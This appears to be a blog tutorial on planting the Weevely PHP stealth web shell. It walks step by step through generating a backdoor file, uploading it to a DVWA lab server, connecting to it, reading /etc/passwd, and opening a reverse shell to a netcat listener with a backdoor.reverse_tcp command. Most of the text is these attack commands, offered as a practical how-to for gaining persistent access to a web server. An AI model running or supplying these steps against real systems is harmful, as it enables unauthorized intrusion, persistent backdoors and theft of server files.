Creating Web Backdoor using Backtrack(Weevely Tutorial)

Weevely PHP stealth web shell and backdoor is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks. It is an essential tool for web application post exploitation, and also can be used as stealth backdoor

Weevely is by defaultly available in OS like Backtrack, Backbox etc.

Weevely php stealth web shell and backdoor has more than 30 modules available for post exploitation tasks.

weevely is written in python.

Lets Start our Practical

Requirement:

1.Webserver for uploading the backdoor ( i installed dvwa on linux box)

2.Weevely PHP Shell(i.e, available in backtrack 5R3)

Steps to start

1.weevely is available in /pentest/backdoors/web/weevely/

Open terminal and type cd /pentest/backdoors/web/weevely/

2.Generate PHP stealth backdoor

./weevely.py generate security

When we execute this command a new file will be created called weevely.php

3.After generatig file the next step will be upload weevely.php file to webserver and we are uploading it to webserver.

I am using DVWA(Damn Vulnerable Web Application) for testing purpose

4.Now file has been successfully uploaded

5.Now access that weevely .php from terminal

./weevely.py

./weevely.py http://192.168.142.135/dvwa/hackable/uploads/weevely.php security

Now we are in server

6.If we want to see files in that directory type ls

7.if we want to see passwords cat /etc/passwd

8.if we want to see who we are

whoami

9.using weevely for backdoor

here i am opening one more terminal and i am starting netcat

nc -lvp 1234

and in weevely terminal

:backdoor.reverse_tcp 192.168.142.132 1234

now we are connected

now you can access all server files.

thank you.

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *

15 − 1 =